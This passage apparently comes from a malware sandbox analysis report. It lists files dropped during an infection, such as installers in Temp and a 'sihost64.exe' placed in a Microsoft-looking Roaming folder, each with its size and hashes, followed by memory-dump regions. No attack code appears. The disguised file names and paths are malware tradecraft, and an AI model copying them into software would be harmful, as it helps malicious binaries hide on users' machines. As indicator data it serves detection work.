9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d

SHA512
bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\JJdPql_.2B

Filesize
232KB

MD5
770b27fbf31087cc450783085296dd4b

SHA1
e11b5a284842ee442a18646611eb8d2fe34b3e59

SHA256
4338a7e054ebab8a375330b93e3d99faa0d3bccd53b2c0c5d3cfd560f977c386

SHA512
46b78e590c4634b8d16c9d9f72fd61bae01e35828b204b19a1ae13156dc688be994ac9bf7cdce048c4907eb52c7a9240705fad6c42899fec29ed32eff396bfcd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Z8ISj6._Nm

Filesize
373KB

MD5
dcae4cf1f6df8ecee8a59809270d12df

SHA1
0e4fc026ae3795f14f3f7606bee2cde9ce0726bf

SHA256
caf0ca04e918436343125e04b29443d566ade372504568ee5a883958f67049ec

SHA512
cdea06242802cc4cb1b0ab2c663a7ee07abed801743036201576680eb61ae59da1f624428fed46cbeba9c225ffa4a068290f3fa26f4103abde76f3322c23d8b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\kdDPilen.~t5

Filesize
103KB

MD5
3a5d1bdea281c18ea044795ada56759b

SHA1
18a7d75b598dbd93baa5e77ce2e57bbbd18c0975

SHA256
436d167234c2913c51685816549be0a32fb5f6b4eb7724797aa211a6b98f1b54

SHA512
3f58d8c995b32f0724fb295c7fdcfed6f884a6d0338193bd29a6fc97d3ac907516dfc04aab0eb41f565db110fcb0a0d4e5a78140860b73fa2ad8696ccdc7ad3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\mzanA.e

Filesize
270KB

MD5
4048075ba32058b2ffb4d02fd8f88568

SHA1
9d35c34fdadce90fa5e8debce667429b9a126059

SHA256
98f66e3e4a0015b41c8598da139dc3ef4f9a7d5795ec8ebeeee1afa48bef2d6b

SHA512
4670adf32f1d1843e4fead5d78946c46ea1b5eaf3d1967ac87ff474b076d0f2f279ad115b22bb6dbfe72fc4b251f6fc86fa1cc12d5f24048e4801cafbef2eb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\oAykH.~~

Filesize
261KB

MD5
da678f3df8a1104ec2ce8c9816b5156c

SHA1
f25f50f2a134270ff5d68fb9334e05e04a499798

SHA256
0f3a327e883e7fd4ec2377e0bf624504fdf91ba8a998d90bcd5d3c0895a26456

SHA512
b040d9211ba1504fd0807c9708a9e925fc33ec2819c2d4aa05462ccc1fc2794fd10d045533b9e4d584147f5c8882cfec0f06213e177b6b932d64fccd30852991

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fdbz42nj.45r.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\e58e683.exe

Filesize
9KB

MD5
99c8a5f7c87b4ec0ac66592a85e129f5

SHA1
3699ef050962cfa6e3d6440a941396c9f022ea52

SHA256
899c95d880933fc5a12f409c8e7821148ef0f9b4a28c226cb9cc6f44caacdbad

SHA512
a3af8e0340d85cc0d83ed0824c98ff1de2aba7d73299ce47ab136df40c44ed34acd5e06d80d22a61b2963bd6c5586d80d446b205aa1e9ddad27b3ba4396b1b18

Download Submit
C:\Users\Admin\AppData\Local\Temp\inst001.exe

Filesize
213KB

MD5
23bcdc132d1f2aaf8d248b6a5bd21801

SHA1
2153acec77f4a57c621a3e38d523eb6df9b29134

SHA256
a7cb6d861c75f36c32cb5a304b0d8d84b5bc0bedd7da2eb942e4d67288f7123b

SHA512
d9684eab46e5431bc69b70154bbef7a3126f0719a80792f120a3a436e6f4f23cf1229d4b4293c1aff4202ab748144ce19dbc4c39f74f631e1b6f9336259f02db

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-2UFHR.tmp\idp.dll

Filesize
216KB

MD5
b37377d34c8262a90ff95a9a92b65ed8

SHA1
faeef415bd0bc2a08cf9fe1e987007bf28e7218d

SHA256
e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f

SHA512
69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-FVDD9.tmp\_isetup\_shfoldr.dll

Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-R6ANR.tmp\setup_2.tmp

Filesize
691KB

MD5
9303156631ee2436db23827e27337be4

SHA1
018e0d5b6ccf7000e36af30cebeb8adc5667e5fa

SHA256
bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4

SHA512
9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

Download Submit
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

Filesize
1.3MB

MD5
f9be28007149d38c6ccb7a7ab1fcf7e5

SHA1
eba6ac68efa579c97da96494cde7ce063579d168

SHA256
5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914

SHA512
8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

Download Submit
C:\Users\Admin\AppData\Local\Temp\kZ_AmsXL.6G

Filesize
1.2MB

MD5
e141dd69d1cf6a3a0bd9c185a0064b49

SHA1
959a997e66acd8410343ed3efed3e5929494b125

SHA256
3a15463ef6c1296aecb36fd653f22938adfe9f9f42c6d5ef24630f22827a70a3

SHA512
efdc55d1c729f08275c5f6cda531baf6db98347b91db377e9f3cddb9399afb0d20bbcadbb103c25d7af48b90409e8bdf77c0065d2285b955a047c66349263999

Download Submit
C:\Users\Admin\AppData\Local\Temp\liuyan-game.exe

Filesize
89KB

MD5
fce1bf8a528a6f3cd7fbfe8c5360bffb

SHA1
1d5a8cba2fe37249f08154f4de532f2b2703fbfd

SHA256
61f6aaf51880570891d51f241af185edfa7ae118b4c4d2ddba4ed12f314db69c

SHA512
a5d559e62289c60348991ff1f8c9663b4e339bf8359bdb2b981824635ee0a475c31c6c5d84d38a9565ec609abe4243d963cccaf435091d1ed55c40498bed990a

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe

Filesize
373KB

MD5
125b57c4ec532854105d8be4f7c3dfed

SHA1
25072be9b94bc6686dbaf23b1a00248828832e85

SHA256
35084d0af555d833bc4a0b3c7344d13802dc69d5470ee1b190e116398e9ddfd4

SHA512
1f90c2316d407dafac74ab587eab48bf131b5f47bc3e799121734baaf21b7eac6dbb3f61096a2370fc318d0d6ca4ee1294ce9e73a1be442cba7499ed5559d20c

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup_2.exe

Filesize
379KB

MD5
662af94a73a6350daea7dcbe5c8dfd38

SHA1
7ab3ddd6e3cf8aaa7fa2c4fa7856bb83ea6a442c

SHA256
df0b82e8877857057a9b64b73281099f723ae74b1353cf216ca11ba6b20b3ef8

SHA512
d864c483bfb74479c90ea38a46fe6cd3d628a8b13bd38acde4ccce3258ec290e5389fe920a4351dadb7fd23f87cd461ecf253c5d926f8277e518a7b5029f583a

Download Submit
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe

Filesize
1.0MB

MD5
f39dd2806d71830979a3110eb9a0ae44

SHA1
fd94b99664d85eede48ab22f27054ab5cc6dd2d3

SHA256
c5763dba038b94970b85fd0a078bcb1977e3973c56780e76b443915a9c30e213

SHA512
ffc5a57fa4982a425e1bb2077affba0113d92365ad6eae849e9d700ee99615128c965de3705d2f2a12c1b46230ef2fc1820e4b74b8a3938b1b7211a228db9e82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
7KB

MD5
339347f8a4bc7137b6a6a485f6cd0688

SHA1
9b198dc642f9f32ea38884d47c1fe7d8868e3f39

SHA256
c6f8eec2d3204bad0712705405fdb09555bf2bc26f83f0cf1d7966b86a46f601

SHA512
04c73aa7cff15895daf42119873df920e2ee9500d1293f470ad590cbd9cccf09f6df206f1aa9fa09e744f404f5365174f570a7f33a9a642453531dcfbaeb26fd

Download Submit
\??\pipe\LOCAL\crashpad_736_OYDIUSDFHTGEFJXL

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/464-379-0x00000000008E0000-0x00000000008E6000-memory.dmp

Filesize
24KB

Download
memory/716-170-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/716-115-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1400-0-0x00000000751FE000-0x00000000751FF000-memory.dmp

Filesize
4KB

Download
memory/1400-1-0x0000000000E70000-0x0000000001352000-memory.dmp

Filesize
4.9MB

Download
memory/1736-239-0x0000000000400000-0x00000000004BD000-memory.dmp

Filesize
756KB

Download
memory/1760-311-0x0000000006380000-0x000000000639E000-memory.dmp

Filesize
120KB

Download
memory/1760-328-0x00000000076A0000-0x00000000076BA000-memory.dmp

Filesize
104KB

Download
memory/1760-336-0x00000000079E0000-0x00000000079E8000-memory.dmp

Filesize
32KB

Download
memory/1760-335-0x0000000007A00000-0x0000000007A1A000-memory.dmp

Filesize
104KB

Download
memory/1760-334-0x0000000007900000-0x0000000007914000-memory.dmp

Filesize
80KB

Download
memory/1760-333-0x00000000078F0000-0x00000000078FE000-memory.dmp

Filesize
56KB

Download
memory/1760-331-0x00000000078A0000-0x00000000078B1000-memory.dmp

Filesize
68KB

Download
memory/1760-330-0x0000000007920000-0x00000000079B6000-memory.dmp

Filesize
600KB

Download
memory/1760-329-0x0000000007720000-0x000000000772A000-memory.dmp

Filesize
40KB

Download
memory/1760-327-0x0000000007CF0000-0x000000000836A000-memory.dmp

Filesize
6.5MB

Download
memory/1760-289-0x0000000005720000-0x0000000005D48000-memory.dmp

Filesize
6.2MB

Download
memory/1760-288-0x0000000002A90000-0x0000000002AC6000-memory.dmp

Filesize
216KB

Download
memory/1760-314-0x00000000068B0000-0x00000000068E2000-memory.dmp

Filesize
200KB

Download
memory/1760-315-0x0000000072D60000-0x0000000072DAC000-memory.dmp

Filesize
304KB

Download
memory/1760-325-0x0000000007560000-0x000000000757E000-memory.dmp

Filesize
120KB

Download
memory/1760-326-0x0000000007580000-0x0000000007623000-memory.dmp

Filesize
652KB

Download
memory/1760-309-0x0000000005DC0000-0x0000000006114000-memory.dmp

Filesize
3.3MB

Download
memory/1760-297-0x00000000055F0000-0x0000000005612000-memory.dmp

Filesize
136KB

Download
memory/1760-299-0x0000000005D50000-0x0000000005DB6000-memory.dmp

Filesize
408KB

Download
memory/1760-298-0x0000000005690000-0x00000000056F6000-memory.dmp

Filesize
408KB

Download
memory/1992-236-0x0000000000400000-0x00000000004D7000-memory.dmp

Filesize
860KB

Download
memory/2236-104-0x00000000003C0000-0x00000000003C8000-memory.dmp

Filesize
32KB

Download
memory/2260-293-0x00000000055F0000-0x000000000562C000-memory.dmp

Filesize
240KB

Download
memory/2260-291-0x0000000005590000-0x00000000055A2000-memory.dmp

Filesize
72KB

Download
memory/2260-279-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2260-294-0x0000000005630000-0x000000000567C000-memory.dmp

Filesize
304KB

Download
memory/2260-292-0x00000000056C0000-0x00000000057CA000-memory.dmp

Filesize
1.0MB

Download
memory/2260-290-0x0000000005B10000-0x0000000006128000-memory.dmp

Filesize
6.1MB

Download
memory/2272-161-0x0000000000400000-0x00000000004BD000-memory.dmp

Filesize
756KB

Download
memory/2628-40-0x0000000001390000-0x00000000013A0000-memory.dmp

Filesize
64KB

Download
memory/2628-41-0x00000000013C0000-0x00000000013D2000-memory.dmp

Filesize
72KB

Download
memory/2628-50-0x00000000013C0000-0x00000000013D2000-memory.dmp

Filesize
72KB

Download
memory/2640-240-0x0000000002410000-0x000000000254A000-memory.dmp

Filesize
1.2MB

Download
memory/2640-251-0x0000000004030000-0x00000000040B6000-memory.dmp

Filesize
536KB

Download
memory/2640-224-0x0000000002410000-0x000000000254A000-memory.dmp

Filesize
1.2MB

Download
memory/2640-231-0x00000000029C0000-0x0000000002A64000-memory.dmp

Filesize
656KB

Download
memory/2640-250-0x0000000003FA0000-0x000000000402B000-memory.dmp

Filesize
556KB

Download
memory/2640-249-0x0000000002B10000-0x0000000003F92000-memory.dmp

Filesize
20.5MB

Download
memory/2640-248-0x0000000002A70000-0x0000000002B02000-memory.dmp

Filesize
584KB

Download
memory/2640-235-0x0000000002A70000-0x0000000002B02000-memory.dmp

Filesize
584KB

Download
memory/2640-233-0x0000000002A70000-0x0000000002B02000-memory.dmp

Filesize
584KB

Download
memory/3404-406-0x0000000000E50000-0x0000000000E58000-memory.dmp

Filesize
32KB

Download
memory/3552-237-0x0000000000400000-0x000000000046A000-memory.dmp

Filesize
424KB

Download
memory/3920-353-0x00000000042E0000-0x0000000004366000-memory.dmp

Filesize
536KB

Download
memory/3920-340-0x0000000002700000-0x000000000283A000-memory.dmp

Filesize
1.2MB

Download
memory/3920-256-0x0000000002700000-0x000000000283A000-memory.dmp

Filesize
1.2MB

Download
memory/3920-261-0x0000000002D20000-0x0000000002DB2000-memory.dmp

Filesize
584KB

Download
memory/3920-361-0x0000000000380000-0x0000000000385000-memory.dmp

Filesize
20KB

Download
memory/3920-258-0x0000000002D20000-0x0000000002DB2000-memory.dmp

Filesize
584KB

Download
memory/3920-360-0x0000000000370000-0x0000000000373000-memory.dmp

Filesize
12KB

Download
memory/3920-359-0x0000000000370000-0x0000000000371000-memory.dmp

Filesize
4KB

Download
memory/3920-356-0x00000000042E0000-0x0000000004366000-memory.dmp

Filesize
536KB

Download
memory/3920-257-0x0000000002C70000-0x0000000002D14000-memory.dmp

Filesize
656KB

Download
memory/3920-351-0x0000000002DC0000-0x0000000004242000-memory.dmp

Filesize
20.5MB

Download
memory/3920-352-0x0000000004250000-0x00000000042DB000-memory.dmp

Filesize
556KB

Download
memory/3920-350-0x0000000002D20000-0x0000000002DB2000-memory.dmp

Filesize
584KB

Download
memory/4184-245-0x0000000002D60000-0x0000000002D6E000-memory.dmp

Filesize
56KB

Download
memory/4184-22-0x00000000002E0000-0x00000000002F0000-memory.dmp

Filesize
64KB

Download
memory/4184-246-0x0000000002E20000-0x0000000002E32000-memory.dmp

Filesize
72KB

Download
memory/4184-21-0x00007FFA91A03000-0x00007FFA91A05000-memory.dmp

Filesize
8KB

Download
memory/4284-169-0x00000000001E0000-0x00000000001E8000-memory.dmp

Filesize
32KB

Download
memory/4968-238-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/4968-165-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/5048-276-0x00000000060F0000-0x0000000006148000-memory.dmp

Filesize
352KB

Download
memory/5048-278-0x0000000006460000-0x0000000006484000-memory.dmp

Filesize
144KB

Download
memory/5048-101-0x0000000000710000-0x000000000079E000-memory.dmp

Filesize
568KB

Download
memory/5048-277-0x00000000069B0000-0x0000000006F54000-memory.dmp

Filesize
5.6MB

Download
memory/5048-119-0x0000000005010000-0x0000000005062000-memory.dmp

Filesize
328KB

Download
memory/5048-202-0x0000000006160000-0x00000000061F2000-memory.dmp

Filesize
584KB

Download
memory/5048-200-0x0000000005C40000-0x0000000005CDC000-memory.dmp

Filesize
624KB

Download
memory/5048-201-0x0000000005BA0000-0x0000000005BAC000-memory.dmp

Filesize
48KB

Download
memory/5104-53-0x0000000001160000-0x0000000001166000-memory.dmp

Filesize
24KB

Download
memory/5104-42-0x0000000000AA0000-0x0000000000AB8000-memory.dmp

Filesize
96KB

Download